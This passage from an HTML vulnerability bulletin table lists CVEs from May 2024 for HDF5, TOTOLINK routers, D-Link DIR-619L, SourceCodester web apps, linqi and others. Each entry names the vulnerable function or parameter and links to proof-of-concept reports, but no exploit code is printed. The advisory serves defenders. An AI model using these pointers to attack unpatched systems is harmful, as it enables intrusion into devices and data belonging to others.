<td>HDF5 Library through 1.14.3 contains a heap-based buffer overflow in H5T__ref_mem_setnull in H5Tref.c (called from H5T__conv_ref in H5Tconv.c), resulting in the corruption of the instruction pointer.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32624" target="_blank">CVE-2024-32624</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue in Open-Source Technology Committee SRS real-time video server RS/4.0.268(Leo) and SRS/4.0.195(Leo) allows a remote attacker to execute arbitrary code via a crafted request.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33250" target="_blank">CVE-2024-33250</a><br><a href="https://github.com/hacker2004/cccccckkkkkk/blob/main/CVE-2024-33250.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>QuickJS commit 3b45d15 was discovered to contain an Assertion Failure via JS_FreeRuntime(JSRuntime *) at quickjs.c.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33263" target="_blank">CVE-2024-33263</a><br><a href="https://github.com/bellard/quickjs/issues/277" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Cross Site Scripting vulnerability in TOTOLINK X2000R before v1.0.0-B20231213.1013 allows a remote attacker to execute arbitrary code via the Guest Access Control parameter in the Wireless Page.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33433" target="_blank">CVE-2024-33433</a><br><a href="https://github.com/4hsien/CVE-vulns/blob/main/TOTOLINK/X2000R/XSS_2_Guest_Access_Control/README.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Buffer Overflow vulnerability in esp-idf v.5.1 allows a remote attacker to execute arbitrary code via a crafted script to the Bluetooth stack component.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33454" target="_blank">CVE-2024-33454</a><br><a href="https://gist.github.com/Zakary-D/30f565c4266c02c62aa9089c363e78e9" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>SQL Injection vulnerability in CASAP Automated Enrollment System using PHP/MySQLi with Source Code V1.0 allows a remote attacker to obtain sensitive information via a crafted payload to the login.php component</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33485" target="_blank">CVE-2024-33485</a><br><a href="https://github.com/CveSecLook/cve/issues/17" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>A buffer overflow vulnerability in /bin/boa on D-Link DIR-619L Rev.B 2.06B1 via goform/formWPS, allows remote authenticated users to trigger a denial of service (DoS) through the parameter "webpage."</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33771" target="_blank">CVE-2024-33771</a><br><a href="https://github.com/YuboZhaoo/IoT/blob/main/D-Link/DIR-619L/20240424.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>A buffer overflow vulnerability in /bin/boa on D-Link DIR-619L Rev.B 2.06B1 via formTcpipSetup allows remote authenticated users to trigger a denial of service (DoS) through the parameter "curTime."</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33772" target="_blank">CVE-2024-33772</a><br><a href="https://github.com/YuboZhaoo/IoT/blob/main/D-Link/DIR-619L/20240424.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>A buffer overflow vulnerability in /bin/boa on D-Link DIR-619L Rev.B 2.06B1 via formWlanGuestSetup allows remote authenticated users to trigger a denial of service (DoS) through the parameter "webpage."</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33773" target="_blank">CVE-2024-33773</a><br><a href="https://github.com/YuboZhaoo/IoT/blob/main/D-Link/DIR-619L/20240424.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>A buffer overflow vulnerability in /bin/boa on D-Link DIR-619L Rev.B 2.06B1 via formWlanSetup_Wizard allows remote authenticated users to trigger a denial of service (DoS) through the parameter "webpage."</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33774" target="_blank">CVE-2024-33774</a><br><a href="https://github.com/YuboZhaoo/IoT/blob/main/D-Link/DIR-619L/20240424.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Globitel KSA SpeechLog v8.1 was discovered to contain an Insecure Direct Object Reference (IDOR) via the userID parameter.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33818" target="_blank">CVE-2024-33818</a><br><a href="https://medium.com/%40rajput.thakur/insecure-direct-object-references-cve-2024-33818-86785aa8c969" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Globitel KSA SpeechLog v8.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Save Query function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33819" target="_blank">CVE-2024-33819</a><br><a href="https://medium.com/%40rajput.thakur/speechlog-v-8-1-stored-cross-site-scripting-cve-2024-33819-1b1164fb0ecd" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered in linqi before 1.4.0.1 on Windows. There is /api/Cdn/GetFile local file inclusion.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33863" target="_blank">CVE-2024-33863</a><br><a href="https://linqi.help/Updates/en#/SecurityUpdates" target="_blank">cve@mitre.org</a><br><a href="https://www.linqi.de/de-DE/blog.html" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered in linqi before 1.4.0.1 on Windows. There is SSRF via Document template generation; i.e., via remote images in process creation, file inclusion, and PDF document generation via malicious JavaScript.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33864" target="_blank">CVE-2024-33864</a><br><a href="https://linqi.help/Updates/en#/SecurityUpdates" target="_blank">cve@mitre.org</a><br><a href="https://www.linqi.de/de-DE/blog.html" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered in linqi before 1.4.0.1 on Windows. There is an NTLM hash leak via the /api/Cdn/GetFile and /api/DocumentTemplate/{GUID] endpoints.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33865" target="_blank">CVE-2024-33865</a><br><a href="https://linqi.help/Updates/en#/SecurityUpdates" target="_blank">cve@mitre.org</a><br><a href="https://www.linqi.de/de-DE/blog.html" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered in linqi before 1.4.0.1 on Windows. There is /api/DocumentTemplate/{GUID] XSS.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33866" target="_blank">CVE-2024-33866</a><br><a href="https://linqi.help/Updates/en#/SecurityUpdates" target="_blank">cve@mitre.org</a><br><a href="https://www.linqi.de/de-DE/blog.html" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered in linqi before 1.4.0.1 on Windows. There is a hardcoded password salt.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33867" target="_blank">CVE-2024-33867</a><br><a href="https://linqi.help/Updates/en#/SecurityUpdates" target="_blank">cve@mitre.org</a><br><a href="https://www.linqi.de/de-DE/blog.html" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An issue was discovered in linqi before 1.4.0.1 on Windows. There is LDAP injection.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33868" target="_blank">CVE-2024-33868</a><br><a href="https://linqi.help/Updates/en#/SecurityUpdates" target="_blank">cve@mitre.org</a><br><a href="https://www.linqi.de/de-DE/blog.html" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 has a heap-based buffer overflow in H5D__scatter_mem in H5Dscatgath.c.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33873" target="_blank">CVE-2024-33873</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 has a heap buffer overflow in H5O__mtime_new_encode in H5Omtime.c.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33874" target="_blank">CVE-2024-33874</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 has a heap-based buffer overflow in H5O__layout_encode in H5Olayout.c, resulting in the corruption of the instruction pointer.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33875" target="_blank">CVE-2024-33875</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 has a heap buffer overflow in H5S__point_deserialize in H5Spoint.c.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33876" target="_blank">CVE-2024-33876</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>HDF5 Library through 1.14.3 has a heap-based buffer overflow in H5T__conv_struct_opt in H5Tconv.c.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33877" target="_blank">CVE-2024-33877</a><br><a href="https://www.hdfgroup.org/2024/05/new-hdf5-cve-issues-fixed-in-1-14-4/" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>The WebTop package for NethServer 7 and 8 allows stored XSS (for example, via the Subject field if an e-mail message).</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34058" target="_blank">CVE-2024-34058</a><br><a href="https://www.openwall.com/lists/oss-security/2024/05/16/3" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>htmly v2.9.6 was discovered to contain an arbitrary file deletion vulnerability via the delete_post() function at admin.php. This vulnerability allows attackers to delete arbitrary files via a crafted request.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34191" target="_blank">CVE-2024-34191</a><br><a href="https://chmod744.super.site/htmly-cve" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Totolink AC1200 Wireless Dual Band Gigabit Router A3002RU_V3 Firmware V3.0.0-B20230809.1615 is vulnerable to Buffer Overflow. The "boa" program allows attackers to modify the value of the "vwlan_idx" field via "formMultiAP". This can lead to a stack overflow through the "formWlEncrypt" CGI function by constructing malicious HTTP requests and passing a WLAN SSID value exceeding the expected length, potentially resulting in command execution or denial of service attacks.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34196" target="_blank">CVE-2024-34196</a><br><a href="https://gist.github.com/Swind1er/1ec2fde42254598a72f1d716f9cfe2a1" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TinyWeb 1.94 and below allows unauthenticated remote attackers to cause a denial of service (Buffer Overflow) when sending excessively large elements in the request line.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34199" target="_blank">CVE-2024-34199</a><br><a href="https://github.com/DMCERTCE/PoC_Tiny_Overflow" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK CPE CP450 v4.1.0cu.747_B20191224 was discovered to contain a stack buffer overflow vulnerability in the setIpQosRules function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34200" target="_blank">CVE-2024-34200</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/setIpQosRules" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK CP450 v4.1.0cu.747_B20191224 was discovered to contain a stack buffer overflow vulnerability in the getSaveConfig function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34201" target="_blank">CVE-2024-34201</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/getSaveConfig" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK CP450 v4.1.0cu.747_B20191224 was discovered to contain a stack buffer overflow vulnerability in the setMacFilterRules function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34202" target="_blank">CVE-2024-34202</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/setMacFilterRules" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK CP450 v4.1.0cu.747_B20191224 was discovered to contain a stack buffer overflow vulnerability in the setLanguageCfg function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34203" target="_blank">CVE-2024-34203</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/setLanguageCfg" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK outdoor CPE CP450 v4.1.0cu.747_B20191224 was discovered to contain a command injection vulnerability in the setUpgradeFW function via the FileName parameter.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34204" target="_blank">CVE-2024-34204</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/setUpgradeFW" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK CP450 v4.1.0cu.747_B20191224 was discovered to contain a command injection vulnerability in the download_firmware function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34205" target="_blank">CVE-2024-34205</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/download_firmware" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK outdoor CPE CP450 v4.1.0cu.747_B20191224 was discovered to contain a command injection vulnerability in the setWebWlanIdx function via the webWlanIdx parameter.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34206" target="_blank">CVE-2024-34206</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/setWebWlanIdx" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK CP450 v4.1.0cu.747_B20191224 was discovered to contain a stack buffer overflow vulnerability in the setStaticDhcpConfig function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34207" target="_blank">CVE-2024-34207</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/setStaticDhcpConfig" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK CP450 v4.1.0cu.747_B20191224 was discovered to contain a stack buffer overflow vulnerability in the setIpPortFilterRules function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34209" target="_blank">CVE-2024-34209</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/setIpPortFilterRules" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK outdoor CPE CP450 v4.1.0cu.747_B20191224 was discovered to contain a command injection vulnerability in the CloudACMunualUpdate function via the FileName parameter.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34210" target="_blank">CVE-2024-34210</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/CloudACMunualUpdate_injection" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK CP450 v4.1.0cu.747_B20191224 was discovered to contain a hardcoded password vulnerability in /etc/shadow.sample, which allows attackers to log in as root.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34211" target="_blank">CVE-2024-34211</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/HardCodeRoot" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK CP450 v4.1.0cu.747_B20191224 was discovered to contain a stack buffer overflow vulnerability in the CloudACMunualUpdate function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34212" target="_blank">CVE-2024-34212</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/CloudACMunualUpdate_overflow" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK CP450 v4.1.0cu.747_B20191224 was discovered to contain a stack buffer overflow vulnerability in the SetPortForwardRules function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34213" target="_blank">CVE-2024-34213</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/SetPortForwardRules" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK CP450 v4.1.0cu.747_B20191224 was discovered to contain a stack buffer overflow vulnerability in the setUrlFilterRules function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34215" target="_blank">CVE-2024-34215</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/SetUrlFilterRules" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK CP450 v4.1.0cu.747_B20191224 was discovered to contain a stack buffer overflow vulnerability in the addWlProfileClientMode function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34217" target="_blank">CVE-2024-34217</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/addWlProfileClientMode" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK outdoor CPE CP450 v4.1.0cu.747_B20191224 was discovered to contain a command injection vulnerability in the NTPSyncWithHost function via the hostTime parameter.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34218" target="_blank">CVE-2024-34218</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/NTPSyncWithHost" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK CP450 V4.1.0cu.747_B20191224 was discovered to contain a vulnerability in the SetTelnetCfg function, which allows attackers to log in through telnet.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34219" target="_blank">CVE-2024-34219</a><br><a href="https://github.com/n0wstr/IOTVuln/tree/main/CP450/SetTelnetCfg" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Sourcecodester Human Resource Management System 1.0 is vulnerable to SQL Injection via the 'leave' parameter.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34220" target="_blank">CVE-2024-34220</a><br><a href="https://github.com/dovankha/CVE-2024-34220" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Sourcecodester Human Resource Management System 1.0 is vulnerable to Insecure Permissions resulting in privilege escalation.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34221" target="_blank">CVE-2024-34221</a><br><a href="https://github.com/dovankha/CVE-2024-34221" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Sourcecodester Human Resource Management System 1.0 is vulnerable to SQL Injection via the searccountry parameter.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34222" target="_blank">CVE-2024-34222</a><br><a href="https://github.com/dovankha/CVE-2024-34222" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Insecure permission vulnerability in /hrm/leaverequest.php in SourceCodester Human Resource Management System 1.0 allow attackers to approve or reject leave ticket.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34223" target="_blank">CVE-2024-34223</a><br><a href="https://github.com/dovankha/CVE-2024-34223" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Cross Site Scripting vulnerability in /php-lms/classes/Users.php?f=save in Computer Laboratory Management System using PHP and MySQL 1.0 allow remote attackers to inject arbitrary web script or HTML via the firstname, middlename, lastname parameters.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34224" target="_blank">CVE-2024-34224</a><br><a href="https://github.com/dovankha/CVE-2024-34224" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Cross Site Scripting vulnerability in php-lms/admin/?page=system_info in Computer Laboratory Management System using PHP and MySQL 1.0 allow remote attackers to inject arbitrary web script or HTML via the name, shortname parameters.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34225" target="_blank">CVE-2024-34225</a><br><a href="https://github.com/dovankha/CVE-2024-34225" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>SQL injection vulnerability in /php-sqlite-vms/?page=manage_visitor&amp;id=1 in SourceCodester Visitor Management System 1.0 allow attackers to execute arbitrary SQL commands via the id parameters.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34226" target="_blank">CVE-2024-34226</a><br><a href="https://github.com/dovankha/CVE-2024-34226" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>A cross-site scripting (XSS) vulnerability in Sourcecodester Laboratory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the System Information parameter.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34230" target="_blank">CVE-2024-34230</a><br><a href="https://github.com/Amrita2000/CVES/blob/main/CVE-2024-34230.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>A cross-site scripting (XSS) vulnerability in Sourcecodester Laboratory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the System Short Name parameter.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34231" target="_blank">CVE-2024-34231</a><br><a href="https://github.com/Amrita2000/CVES/blob/main/CVE-2024-34231.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>A cross-site scripting (XSS) vulnerability in Rocketsoft Rocket LMS 1.9 allows an administrator to store a JavaScript payload using the admin web interface when creating new courses and new course notifications.</td>
<td>2024-05-17</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34241" target="_blank">CVE-2024-34241</a><br><a href="https://grumpz.net/cve-2024-34241-a-step-by-step-discovery-guide" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Konga v0.14.9 is vulnerable to Cross Site Scripting (XSS) via the username parameter.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34243" target="_blank">CVE-2024-34243</a><br><a href="https://github.com/JByteL/CVE/tree/main/CVE-2024-34243" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>An arbitrary file read vulnerability in DedeCMS v5.7.114 allows authenticated attackers to read arbitrary files by specifying any path in makehtml_js_action.php.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34245" target="_blank">CVE-2024-34245</a><br><a href="https://github.com/Stoocea/Vulnerability-analysis-Notes/blob/main/cms/DedeCMS-V5.7.114%20%20Arbitrary%20file%20read%20vulnerability.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>OFCMS V1.1.2 is vulnerable to SQL Injection via the new table function.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34256" target="_blank">CVE-2024-34256</a><br><a href="https://github.com/ZackSecurity/VulnerReport/blob/cve/ofcms/1.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>njwt up to v0.4.0 was discovered to contain a prototype pollution in the Parser.prototype.parse method.</td>
<td>2024-05-16</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34273" target="_blank">CVE-2024-34273</a><br><a href="https://github.com/chrisandoryan/vuln-advisory/blob/main/nJwt/CVE-2024-34273.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>TOTOLINK LR350 V9.3.5u.6369_B20220309 was discovered to contain a stack overflow via the password parameter in the function urldecode.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34308" target="_blank">CVE-2024-34308</a><br><a href="https://github.com/s4ndw1ch136/IOT-vuln-reports/blob/main/totolink%20LR350/README.md" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>Jin Fang Times Content Management System v3.2.3 was discovered to contain a SQL injection vulnerability via the id parameter.</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34310" target="_blank">CVE-2024-34310</a><br><a href="https://github.com/3309899621/CVE-2024-34310" target="_blank">cve@mitre.org</a></td>
</tr>
<tr>
<td>n/a--n/a<br> </td>
<td>A Blind command injection vulnerability in Tenda O3V2 V1.0.0.12 and earlier allows remote attackers to execute operating system commands via dest parameter in /goform/getTraceroute</td>
<td>2024-05-14</td>
<td>not yet calculated</td>
